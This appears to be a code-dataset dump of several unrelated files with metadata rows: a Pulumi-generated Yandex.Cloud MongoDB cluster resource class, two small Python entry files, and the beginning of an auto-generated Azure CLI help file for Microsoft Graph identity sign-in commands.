:param pulumi.Input[str] folder_id: The ID of the folder that the resource belongs to. If it
is not provided, the default provider folder is used.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MdbMongodbClusterHostArgs']]]] hosts: A host of the MongoDB cluster. The structure is documented below.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] labels: A set of key/value label pairs to assign to the MongoDB cluster.
:param pulumi.Input[str] name: Name of the MongoDB cluster.
:param pulumi.Input[str] network_id: ID of the network to which the MongoDB cluster belongs.
:param pulumi.Input[pulumi.InputType['MdbMongodbClusterResourcesArgs']] resources: Resources allocated to hosts of the MongoDB cluster. The structure is documented below.
:param pulumi.Input[Sequence[pulumi.Input[str]]] security_group_ids: A set of IDs of security groups assigned to hosts of the cluster.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MdbMongodbClusterUserArgs']]]] users: A user of the MongoDB cluster. The structure is documented below.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: MdbMongodbClusterArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Manages a MongoDB cluster within the Yandex.Cloud. For more information, see
[the official documentation](https://cloud.yandex.com/docs/managed-mongodb/concepts).
## Example Usage
Example of creating a single-node MongoDB cluster.
```python
import pulumi
import pulumi_yandex as yandex
foo_vpc_network = yandex.VpcNetwork("fooVpcNetwork")
foo_vpc_subnet = yandex.VpcSubnet("fooVpcSubnet",
network_id=foo_vpc_network.id,
v4_cidr_blocks=["10.1.0.0/24"],
zone="ru-central1-a")
foo_mdb_mongodb_cluster = yandex.MdbMongodbCluster("fooMdbMongodbCluster",
cluster_config=yandex.MdbMongodbClusterClusterConfigArgs(
version="4.2",
),
databases=[yandex.MdbMongodbClusterDatabaseArgs(
name="testdb",
)],
environment="PRESTABLE",
hosts=[yandex.MdbMongodbClusterHostArgs(
subnet_id=foo_vpc_subnet.id,
zone_id="ru-central1-a",
)],
labels={
"test_key": "test_value",
},
maintenance_window=yandex.MdbMongodbClusterMaintenanceWindowArgs(
type="ANYTIME",
),
network_id=foo_vpc_network.id,
resources=yandex.MdbMongodbClusterResourcesArgs(
disk_size=16,
disk_type_id="network-hdd",
resource_preset_id="b1.nano",
),
users=[yandex.MdbMongodbClusterUserArgs(
name="john",
password="password",
permissions=[yandex.MdbMongodbClusterUserPermissionArgs(
database_name="testdb",
)],
)])
```
## Import
A cluster can be imported using the `id` of the resource, e.g.
```sh
$ pulumi import yandex:index/mdbMongodbCluster:MdbMongodbCluster foo cluster_id
```
:param str resource_name: The name of the resource.
:param MdbMongodbClusterArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(MdbMongodbClusterArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
cluster_config: Optional[pulumi.Input[pulumi.InputType['MdbMongodbClusterClusterConfigArgs']]] = None,
cluster_id: Optional[pulumi.Input[str]] = None,
databases: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MdbMongodbClusterDatabaseArgs']]]]] = None,
deletion_protection: Optional[pulumi.Input[bool]] = None,
description: Optional[pulumi.Input[str]] = None,
environment: Optional[pulumi.Input[str]] = None,
folder_id: Optional[pulumi.Input[str]] = None,
hosts: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MdbMongodbClusterHostArgs']]]]] = None,
labels: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
maintenance_window: Optional[pulumi.Input[pulumi.InputType['MdbMongodbClusterMaintenanceWindowArgs']]] = None,
name: Optional[pulumi.Input[str]] = None,
network_id: Optional[pulumi.Input[str]] = None,
resources: Optional[pulumi.Input[pulumi.InputType['MdbMongodbClusterResourcesArgs']]] = None,
security_group_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
users: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MdbMongodbClusterUserArgs']]]]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = MdbMongodbClusterArgs.__new__(MdbMongodbClusterArgs)
if cluster_config is None and not opts.urn:
raise TypeError("Missing required property 'cluster_config'")
__props__.__dict__["cluster_config"] = cluster_config
__props__.__dict__["cluster_id"] = cluster_id
if databases is None and not opts.urn:
raise TypeError("Missing required property 'databases'")
__props__.__dict__["databases"] = databases
__props__.__dict__["deletion_protection"] = deletion_protection
__props__.__dict__["description"] = description
if environment is None and not opts.urn:
raise TypeError("Missing required property 'environment'")
__props__.__dict__["environment"] = environment
__props__.__dict__["folder_id"] = folder_id
if hosts is None and not opts.urn:
raise TypeError("Missing required property 'hosts'")
__props__.__dict__["hosts"] = hosts
__props__.__dict__["labels"] = labels
__props__.__dict__["maintenance_window"] = maintenance_window
__props__.__dict__["name"] = name
if network_id is None and not opts.urn:
raise TypeError("Missing required property 'network_id'")
__props__.__dict__["network_id"] = network_id
if resources is None and not opts.urn:
raise TypeError("Missing required property 'resources'")
__props__.__dict__["resources"] = resources
__props__.__dict__["security_group_ids"] = security_group_ids
if users is None and not opts.urn:
raise TypeError("Missing required property 'users'")
__props__.__dict__["users"] = users
__props__.__dict__["created_at"] = None
__props__.__dict__["health"] = None
__props__.__dict__["sharded"] = None
__props__.__dict__["status"] = None
super(MdbMongodbCluster, __self__).__init__(
'yandex:index/mdbMongodbCluster:MdbMongodbCluster',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
cluster_config: Optional[pulumi.Input[pulumi.InputType['MdbMongodbClusterClusterConfigArgs']]] = None,
cluster_id: Optional[pulumi.Input[str]] = None,
created_at: Optional[pulumi.Input[str]] = None,
databases: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MdbMongodbClusterDatabaseArgs']]]]] = None,
deletion_protection: Optional[pulumi.Input[bool]] = None,
description: Optional[pulumi.Input[str]] = None,
environment: Optional[pulumi.Input[str]] = None,
folder_id: Optional[pulumi.Input[str]] = None,
health: Optional[pulumi.Input[str]] = None,
hosts: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MdbMongodbClusterHostArgs']]]]] = None,
labels: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
maintenance_window: Optional[pulumi.Input[pulumi.InputType['MdbMongodbClusterMaintenanceWindowArgs']]] = None,
name: Optional[pulumi.Input[str]] = None,
network_id: Optional[pulumi.Input[str]] = None,
resources: Optional[pulumi.Input[pulumi.InputType['MdbMongodbClusterResourcesArgs']]] = None,
security_group_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
sharded: Optional[pulumi.Input[bool]] = None,
status: Optional[pulumi.Input[str]] = None,
users: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MdbMongodbClusterUserArgs']]]]] = None) -> 'MdbMongodbCluster':
"""
Get an existing MdbMongodbCluster resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[pulumi.InputType['MdbMongodbClusterClusterConfigArgs']] cluster_config: Configuration of the MongoDB subcluster. The structure is documented below.
:param pulumi.Input[str] cluster_id: The ID of the cluster.
:param pulumi.Input[str] created_at: Creation timestamp of the cluster.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MdbMongodbClusterDatabaseArgs']]]] databases: A database of the MongoDB cluster. The structure is documented below.
:param pulumi.Input[bool] deletion_protection: Inhibits deletion of the cluster. Can be either `true` or `false`.
:param pulumi.Input[str] description: Description of the MongoDB cluster.
:param pulumi.Input[str] environment: Deployment environment of the MongoDB cluster. Can be either `PRESTABLE` or `PRODUCTION`.
:param pulumi.Input[str] folder_id: The ID of the folder that the resource belongs to. If it
is not provided, the default provider folder is used.
:param pulumi.Input[str] health: Aggregated health of the cluster.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MdbMongodbClusterHostArgs']]]] hosts: A host of the MongoDB cluster. The structure is documented below.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] labels: A set of key/value label pairs to assign to the MongoDB cluster.
:param pulumi.Input[str] name: Name of the MongoDB cluster.
:param pulumi.Input[str] network_id: ID of the network to which the MongoDB cluster belongs.
:param pulumi.Input[pulumi.InputType['MdbMongodbClusterResourcesArgs']] resources: Resources allocated to hosts of the MongoDB cluster. The structure is documented below.
:param pulumi.Input[Sequence[pulumi.Input[str]]] security_group_ids: A set of IDs of security groups assigned to hosts of the cluster.
:param pulumi.Input[bool] sharded: Whether sharding (MongoDB cluster mode) is enabled.
:param pulumi.Input[str] status: Status of the cluster. Can be either `CREATING`, `STARTING`, `RUNNING`, `UPDATING`, `STOPPING`, `STOPPED`, `ERROR` or `STATUS_UNKNOWN`.
For more information see `status` field of JSON representation in [the official documentation](https://cloud.yandex.com/docs/managed-mongodb/api-ref/Cluster/).
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MdbMongodbClusterUserArgs']]]] users: A user of the MongoDB cluster. The structure is documented below.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _MdbMongodbClusterState.__new__(_MdbMongodbClusterState)
__props__.__dict__["cluster_config"] = cluster_config
__props__.__dict__["cluster_id"] = cluster_id
__props__.__dict__["created_at"] = created_at
__props__.__dict__["databases"] = databases
__props__.__dict__["deletion_protection"] = deletion_protection
__props__.__dict__["description"] = description
__props__.__dict__["environment"] = environment
__props__.__dict__["folder_id"] = folder_id
__props__.__dict__["health"] = health
__props__.__dict__["hosts"] = hosts
__props__.__dict__["labels"] = labels
__props__.__dict__["maintenance_window"] = maintenance_window
__props__.__dict__["name"] = name
__props__.__dict__["network_id"] = network_id
__props__.__dict__["resources"] = resources
__props__.__dict__["security_group_ids"] = security_group_ids
__props__.__dict__["sharded"] = sharded
__props__.__dict__["status"] = status
__props__.__dict__["users"] = users
return MdbMongodbCluster(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="clusterConfig")
def cluster_config(self) -> pulumi.Output['outputs.MdbMongodbClusterClusterConfig']:
"""
Configuration of the MongoDB subcluster. The structure is documented below.
"""
return pulumi.get(self, "cluster_config")
@property
@pulumi.getter(name="clusterId")
def cluster_id(self) -> pulumi.Output[str]:
"""
The ID of the cluster.
"""
return pulumi.get(self, "cluster_id")
@property
@pulumi.getter(name="createdAt")
def created_at(self) -> pulumi.Output[str]:
"""
Creation timestamp of the cluster.
"""
return pulumi.get(self, "created_at")
@property
@pulumi.getter
def databases(self) -> pulumi.Output[Sequence['outputs.MdbMongodbClusterDatabase']]:
"""
A database of the MongoDB cluster. The structure is documented below.
"""
return pulumi.get(self, "databases")
@property
@pulumi.getter(name="deletionProtection")
def deletion_protection(self) -> pulumi.Output[bool]:
"""
Inhibits deletion of the cluster. Can be either `true` or `false`.
"""
return pulumi.get(self, "deletion_protection")
@property
@pulumi.getter
def description(self) -> pulumi.Output[str]:
"""
Description of the MongoDB cluster.
"""
return pulumi.get(self, "description")
@property
@pulumi.getter
def environment(self) -> pulumi.Output[str]:
"""
Deployment environment of the MongoDB cluster. Can be either `PRESTABLE` or `PRODUCTION`.
"""
return pulumi.get(self, "environment")
@property
@pulumi.getter(name="folderId")
def folder_id(self) -> pulumi.Output[str]:
"""
The ID of the folder that the resource belongs to. If it
is not provided, the default provider folder is used.
"""
return pulumi.get(self, "folder_id")
@property
@pulumi.getter
def health(self) -> pulumi.Output[str]:
"""
Aggregated health of the cluster.
"""
return pulumi.get(self, "health")
@property
@pulumi.getter
def hosts(self) -> pulumi.Output[Sequence['outputs.MdbMongodbClusterHost']]:
"""
A host of the MongoDB cluster. The structure is documented below.
"""
return pulumi.get(self, "hosts")
@property
@pulumi.getter
def labels(self) -> pulumi.Output[Mapping[str, str]]:
"""
A set of key/value label pairs to assign to the MongoDB cluster.
"""
return pulumi.get(self, "labels")
@property
@pulumi.getter(name="maintenanceWindow")
def maintenance_window(self) -> pulumi.Output['outputs.MdbMongodbClusterMaintenanceWindow']:
return pulumi.get(self, "maintenance_window")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Name of the MongoDB cluster.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="networkId")
def network_id(self) -> pulumi.Output[str]:
"""
ID of the network to which the MongoDB cluster belongs.
"""
return pulumi.get(self, "network_id")
@property
@pulumi.getter
def resources(self) -> pulumi.Output['outputs.MdbMongodbClusterResources']:
"""
Resources allocated to hosts of the MongoDB cluster. The structure is documented below.
"""
return pulumi.get(self, "resources")
@property
@pulumi.getter(name="securityGroupIds")
def security_group_ids(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
A set of IDs of security groups assigned to hosts of the cluster.
"""
return pulumi.get(self, "security_group_ids")
@property
@pulumi.getter
def sharded(self) -> pulumi.Output[bool]:
"""
Whether sharding (MongoDB cluster mode) is enabled.
"""
return pulumi.get(self, "sharded")
@property
@pulumi.getter
def status(self) -> pulumi.Output[str]:
"""
Status of the cluster. Can be either `CREATING`, `STARTING`, `RUNNING`, `UPDATING`, `STOPPING`, `STOPPED`, `ERROR` or `STATUS_UNKNOWN`.
For more information see `status` field of JSON representation in [the official documentation](https://cloud.yandex.com/docs/managed-mongodb/api-ref/Cluster/).
"""
return pulumi.get(self, "status")
@property
@pulumi.getter
def users(self) -> pulumi.Output[Sequence['outputs.MdbMongodbClusterUser']]:
"""
A user of the MongoDB cluster. The structure is documented below.
"""
return pulumi.get(self, "users")
| 46.413628 | 183 | 0.652027 | 5,293 | 48,363 | 5.78481 | 0.053845 | 0.102028 | 0.080669 | 0.04311 | 0.910872 | 0.889448 | 0.864594 | 0.839773 | 0.837323 | 0.818773 | 0 | 0.000843 | 0.239708 | 48,363 | 1,041 | 184 | 46.458213 | 0.831874 | 0.333912 | 0 | 0.727592 | 1 | 0 | 0.143876 | 0.06462 | 0 | 0 | 0 | 0 | 0 | 1 | 0.165202 | false | 0.001757 | 0.012302 | 0.005272 | 0.27768 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
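Besides the constructor, the generated class in the row above exposes a static `get()` method for adopting an already-provisioned cluster into a Pulumi program. A minimal sketch of calling it; the resource name and cluster ID below are placeholders:

```python
import pulumi
import pulumi_yandex as yandex

# Look up an existing cluster by its provider ID; the returned object carries
# the same read-only outputs (status, health, sharded, ...) as one created here.
existing = yandex.MdbMongodbCluster.get("existing", id="<cluster-id>")
pulumi.export("mongo_status", existing.status)
```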
64e7c68416d212fe22a6f40a79b1a13b9e4b67aa | 46 | py | Python | blueprint/__init__.py | sspicher/helloworld | 797c430149696d6754c6c846a4fcdd0a5ad58766 | [
"Unlicense"
] | null | null | null | blueprint/__init__.py | sspicher/helloworld | 797c430149696d6754c6c846a4fcdd0a5ad58766 | [
"Unlicense"
] | null | null | null | blueprint/__init__.py | sspicher/helloworld | 797c430149696d6754c6c846a4fcdd0a5ad58766 | [
"Unlicense"
] | null | null | null | # __init__.py
from .blueprint import Blueprint | 23 | 32 | 0.826087 | 6 | 46 | 5.666667 | 0.833333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.108696 | 46 | 2 | 32 | 23 | 0.829268 | 0.23913 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | 7 |
8f155ce48d49c293519b2ab123155a87008f3367 | 131 | py | Python | threed_strudel/bin/strudel_chopModelMapMPI.py | emdb-empiar/3dstrudel | 88ec3a2c54bdce87298bba0a32c8ce753fd5fd08 | [
"Apache-2.0"
] | null | null | null | threed_strudel/bin/strudel_chopModelMapMPI.py | emdb-empiar/3dstrudel | 88ec3a2c54bdce87298bba0a32c8ce753fd5fd08 | [
"Apache-2.0"
] | 1 | 2021-06-03T13:53:02.000Z | 2021-12-15T14:18:12.000Z | threed_strudel/bin/strudel_chopModelMapMPI.py | emdb-empiar/3dstrudel | 88ec3a2c54bdce87298bba0a32c8ce753fd5fd08 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
from threed_strudel.chop import chop_model_map_mpi
if __name__ == '__main__':
chop_model_map_mpi.main() | 21.833333 | 50 | 0.770992 | 21 | 131 | 4.095238 | 0.714286 | 0.209302 | 0.27907 | 0.348837 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.122137 | 131 | 6 | 51 | 21.833333 | 0.747826 | 0.152672 | 0 | 0 | 0 | 0 | 0.072072 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.333333 | 0 | 0.333333 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
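The file in the row above is only an entry point: it delegates to `chop_model_map_mpi.main()`, whose MPI work-splitting lives in the imported module and is not shown here. As an assumption-laden sketch, MPI batch scripts of this shape commonly stripe a job list across ranks; mpi4py and the `chop_one` worker below are stand-ins, not taken from the module:

```python
from mpi4py import MPI

def chop_one(job):
    """Hypothetical stand-in for the real model/map chopping routine."""
    print(f"chopping job {job}")

def main():
    comm = MPI.COMM_WORLD
    rank, size = comm.Get_rank(), comm.Get_size()
    jobs = list(range(100))       # placeholder work items
    for job in jobs[rank::size]:  # each rank takes every size-th job
        chop_one(job)

if __name__ == '__main__':
    main()
```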
8f271c57cfad451578e88e35f77d5d9aeecea24d | 52,560 | py | Python | msgraph/cli/command_modules/identitysignins/azext_identitysignins/generated/_help.py | microsoftgraph/msgraph-cli-archived | 489f70bf4ede1ce67b84bfb31e66da3e4db76062 | [
"MIT"
] | null | null | null | msgraph/cli/command_modules/identitysignins/azext_identitysignins/generated/_help.py | microsoftgraph/msgraph-cli-archived | 489f70bf4ede1ce67b84bfb31e66da3e4db76062 | [
"MIT"
] | 22 | 2022-03-29T22:54:37.000Z | 2022-03-29T22:55:27.000Z | msgraph/cli/command_modules/identitysignins/azext_identitysignins/generated/_help.py | microsoftgraph/msgraph-cli-archived | 489f70bf4ede1ce67b84bfb31e66da3e4db76062 | [
"MIT"
] | null | null | null | # --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
# pylint: disable=too-many-lines
from knack.help_files import helps
helps['identitysignins'] = '''
type: group
short-summary: Manage Identity Sign Ins
'''
helps['identitysignins datapolicyoperationsdatapolicyoperation'] = """
type: group
short-summary: Manage datapolicyoperationsdatapolicyoperation with identitysignins
"""
helps['identitysignins datapolicyoperationsdatapolicyoperation create-data-policy-operation'] = """
type: command
short-summary: "Add new entity to dataPolicyOperations."
"""
helps['identitysignins datapolicyoperationsdatapolicyoperation delete-data-policy-operation'] = """
type: command
short-summary: "Delete entity from dataPolicyOperations."
"""
helps['identitysignins datapolicyoperationsdatapolicyoperation list-data-policy-operation'] = """
type: command
short-summary: "Get entities from dataPolicyOperations."
"""
helps['identitysignins datapolicyoperationsdatapolicyoperation show-data-policy-operation'] = """
type: command
short-summary: "Get entity from dataPolicyOperations by key."
"""
helps['identitysignins datapolicyoperationsdatapolicyoperation update-data-policy-operation'] = """
type: command
short-summary: "Update entity in dataPolicyOperations."
"""
helps['identitysignins identity'] = """
type: group
short-summary: Manage identity with identitysignins
"""
helps['identitysignins identity delete-conditional-access'] = """
type: command
short-summary: "Delete navigation property conditionalAccess for identity."
"""
helps['identitysignins identity show-conditional-access'] = """
type: command
short-summary: "Get conditionalAccess from identity."
"""
helps['identitysignins identity update-conditional-access'] = """
type: command
short-summary: "Update the navigation property conditionalAccess in identity."
parameters:
- name: --named-locations
long-summary: |
Usage: --named-locations created-date-time=XX display-name=XX modified-date-time=XX id=XX
created-date-time: The Timestamp type represents creation date and time of the location using ISO 8601 \
format and is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: \
'2014-01-01T00:00:00Z'. Read-only.
display-name: Human-readable name of the location.
modified-date-time: The Timestamp type represents last modified date and time of the location using ISO \
8601 format and is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: \
'2014-01-01T00:00:00Z'. Read-only.
id: Read-only.
Multiple actions can be specified by using more than one --named-locations argument.
"""
helps['identitysignins identityconditionalaccess'] = """
type: group
short-summary: Manage identityconditionalaccess with identitysignins
"""
helps['identitysignins identityconditionalaccess create-named-location'] = """
type: command
short-summary: "Create new navigation property to namedLocations for identity."
"""
helps['identitysignins identityconditionalaccess create-policy'] = """
type: command
short-summary: "Create new navigation property to policies for identity."
parameters:
- name: --grant-controls
short-summary: "conditionalAccessGrantControls"
long-summary: |
Usage: --grant-controls built-in-controls=XX custom-authentication-factors=XX operator=XX terms-of-use=XX
built-in-controls: List of values of built-in controls required by the policy. Possible values: Block, \
Mfa, CompliantDevice, DomainJoinedDevice, ApprovedApplication, CompliantApplication
custom-authentication-factors: List of custom controls IDs required by the policy. For more information, \
see Custom controls.
operator: Defines the relationship of the grant controls. Possible values: AND, OR.
terms-of-use: List of terms of use IDs required by the policy.
- name: --application-enforced-restrictions
short-summary: "applicationEnforcedRestrictionsSessionControl"
long-summary: |
Usage: --application-enforced-restrictions is-enabled=XX
is-enabled: Specifies whether the session control is enabled.
- name: --cloud-app-security
short-summary: "cloudAppSecuritySessionControl"
long-summary: |
Usage: --cloud-app-security cloud-app-security-type=XX is-enabled=XX
is-enabled: Specifies whether the session control is enabled.
- name: --persistent-browser
short-summary: "persistentBrowserSessionControl"
long-summary: |
Usage: --persistent-browser mode=XX is-enabled=XX
is-enabled: Specifies whether the session control is enabled.
- name: --sign-in-frequency
short-summary: "signInFrequencySessionControl"
long-summary: |
Usage: --sign-in-frequency type=XX value=XX is-enabled=XX
value: The number of days or hours.
is-enabled: Specifies whether the session control is enabled.
- name: --applications
short-summary: "conditionalAccessApplications"
long-summary: |
Usage: --applications exclude-applications=XX include-applications=XX include-user-actions=XX
exclude-applications: The list of application IDs explicitly excluded from the policy.
include-applications: The list of application IDs the policy applies to, unless explicitly excluded (in \
excludeApplications). Can also be set to All.
include-user-actions: User actions to include. For example, urn:user:registersecurityinfo
- name: --locations
short-summary: "conditionalAccessLocations"
long-summary: |
Usage: --locations exclude-locations=XX include-locations=XX
exclude-locations: Location IDs excluded from scope of policy.
include-locations: Location IDs in scope of policy unless explicitly excluded, All, or AllTrusted.
- name: --platforms
short-summary: "conditionalAccessPlatforms"
long-summary: |
Usage: --platforms exclude-platforms=XX include-platforms=XX
exclude-platforms: Possible values are: android, iOS, windows, windowsPhone, macOS, unknownFutureValue.
include-platforms: Possible values are: android, iOS, windows, windowsPhone, macOS, all, \
unknownFutureValue.
- name: --users
short-summary: "conditionalAccessUsers"
long-summary: |
Usage: --users exclude-groups=XX exclude-roles=XX exclude-users=XX include-groups=XX include-roles=XX \
include-users=XX
exclude-groups: Group IDs excluded from scope of policy.
exclude-roles: Role IDs excluded from scope of policy.
exclude-users: User IDs excluded from scope of policy and/or GuestsOrExternalUsers.
include-groups: Group IDs in scope of policy unless explicitly excluded, or All.
include-roles: Role IDs in scope of policy unless explicitly excluded, or All.
include-users: User IDs in scope of policy unless explicitly excluded, or None or All or \
GuestsOrExternalUsers.
"""
helps['identitysignins identityconditionalaccess delete-named-location'] = """
type: command
short-summary: "Delete navigation property namedLocations for identity."
"""
helps['identitysignins identityconditionalaccess delete-policy'] = """
type: command
short-summary: "Delete navigation property policies for identity."
"""
helps['identitysignins identityconditionalaccess list-named-location'] = """
type: command
short-summary: "Get namedLocations from identity."
"""
helps['identitysignins identityconditionalaccess list-policy'] = """
type: command
short-summary: "Get policies from identity."
"""
helps['identitysignins identityconditionalaccess show-named-location'] = """
type: command
short-summary: "Get namedLocations from identity."
"""
helps['identitysignins identityconditionalaccess show-policy'] = """
type: command
short-summary: "Get policies from identity."
"""
helps['identitysignins identityconditionalaccess update-named-location'] = """
type: command
short-summary: "Update the navigation property namedLocations in identity."
"""
helps['identitysignins identityconditionalaccess update-policy'] = """
type: command
short-summary: "Update the navigation property policies in identity."
parameters:
- name: --grant-controls
short-summary: "conditionalAccessGrantControls"
long-summary: |
Usage: --grant-controls built-in-controls=XX custom-authentication-factors=XX operator=XX terms-of-use=XX
built-in-controls: List of values of built-in controls required by the policy. Possible values: Block, \
Mfa, CompliantDevice, DomainJoinedDevice, ApprovedApplication, CompliantApplication
custom-authentication-factors: List of custom controls IDs required by the policy. For more information, \
see Custom controls.
operator: Defines the relationship of the grant controls. Possible values: AND, OR.
terms-of-use: List of terms of use IDs required by the policy.
- name: --application-enforced-restrictions
short-summary: "applicationEnforcedRestrictionsSessionControl"
long-summary: |
Usage: --application-enforced-restrictions is-enabled=XX
is-enabled: Specifies whether the session control is enabled.
- name: --cloud-app-security
short-summary: "cloudAppSecuritySessionControl"
long-summary: |
Usage: --cloud-app-security cloud-app-security-type=XX is-enabled=XX
cloud-app-security-type: Possible values are: mcasConfigured, monitorOnly, blockDownloads, unknownFutureValue.
is-enabled: Specifies whether the session control is enabled.
- name: --persistent-browser
short-summary: "persistentBrowserSessionControl"
long-summary: |
Usage: --persistent-browser mode=XX is-enabled=XX
mode: Possible values are: always, never.
is-enabled: Specifies whether the session control is enabled.
- name: --sign-in-frequency
short-summary: "signInFrequencySessionControl"
long-summary: |
Usage: --sign-in-frequency type=XX value=XX is-enabled=XX
type: Possible values are: days, hours.
value: The number of days or hours.
is-enabled: Specifies whether the session control is enabled.
- name: --applications
short-summary: "conditionalAccessApplications"
long-summary: |
Usage: --applications exclude-applications=XX include-applications=XX include-user-actions=XX
exclude-applications: The list of application IDs explicitly excluded from the policy.
include-applications: The list of application IDs the policy applies to, unless explicitly excluded (in \
excludeApplications). Can also be set to All.
include-user-actions: User actions to include. For example, urn:user:registersecurityinfo
- name: --locations
short-summary: "conditionalAccessLocations"
long-summary: |
Usage: --locations exclude-locations=XX include-locations=XX
exclude-locations: Location IDs excluded from scope of policy.
include-locations: Location IDs in scope of policy unless explicitly excluded, All, or AllTrusted.
- name: --platforms
short-summary: "conditionalAccessPlatforms"
long-summary: |
Usage: --platforms exclude-platforms=XX include-platforms=XX
exclude-platforms: Possible values are: android, iOS, windows, windowsPhone, macOS, unknownFutureValue.
include-platforms: Possible values are: android, iOS, windows, windowsPhone, macOS, all, \
unknownFutureValue.
- name: --users
short-summary: "conditionalAccessUsers"
long-summary: |
Usage: --users exclude-groups=XX exclude-roles=XX exclude-users=XX include-groups=XX include-roles=XX \
include-users=XX
exclude-groups: Group IDs excluded from scope of policy.
exclude-roles: Role IDs excluded from scope of policy.
exclude-users: User IDs excluded from scope of policy and/or GuestsOrExternalUsers.
include-groups: Group IDs in scope of policy unless explicitly excluded, or All.
include-roles: Role IDs in scope of policy unless explicitly excluded, or All.
include-users: User IDs in scope of policy unless explicitly excluded, or None or All or \
GuestsOrExternalUsers.
"""
helps['identitysignins identityprovidersidentityprovider'] = """
type: group
short-summary: Manage identityprovidersidentityprovider with identitysignins
"""
helps['identitysignins identityprovidersidentityprovider create-identity-provider'] = """
type: command
short-summary: "Add new entity to identityProviders."
"""
helps['identitysignins identityprovidersidentityprovider delete-identity-provider'] = """
type: command
short-summary: "Delete entity from identityProviders."
"""
helps['identitysignins identityprovidersidentityprovider list-identity-provider'] = """
type: command
short-summary: "Get entities from identityProviders."
"""
helps['identitysignins identityprovidersidentityprovider show-identity-provider'] = """
type: command
short-summary: "Get entity from identityProviders by key."
"""
helps['identitysignins identityprovidersidentityprovider update-identity-provider'] = """
type: command
short-summary: "Update entity in identityProviders."
"""
helps['identitysignins informationprotection'] = """
type: group
short-summary: Manage informationprotection with identitysignins
"""
helps['identitysignins informationprotection show-information-protection'] = """
type: command
short-summary: "Get informationProtection."
"""
helps['identitysignins informationprotection update-information-protection'] = """
type: command
short-summary: "Update informationProtection."
"""
helps['identitysignins informationprotection create-threat-assessment-request'] = """
type: command
short-summary: "Create new navigation property to threatAssessmentRequests for informationProtection."
parameters:
- name: --results
short-summary: "A collection of threat assessment results. Read-only. By default, a GET \
/threatAssessmentRequests/{id} does not return this property unless you apply $expand on it."
long-summary: |
Usage: --results created-date-time=XX message=XX result-type=XX id=XX
created-date-time: The Timestamp type represents date and time information using ISO 8601 format and is \
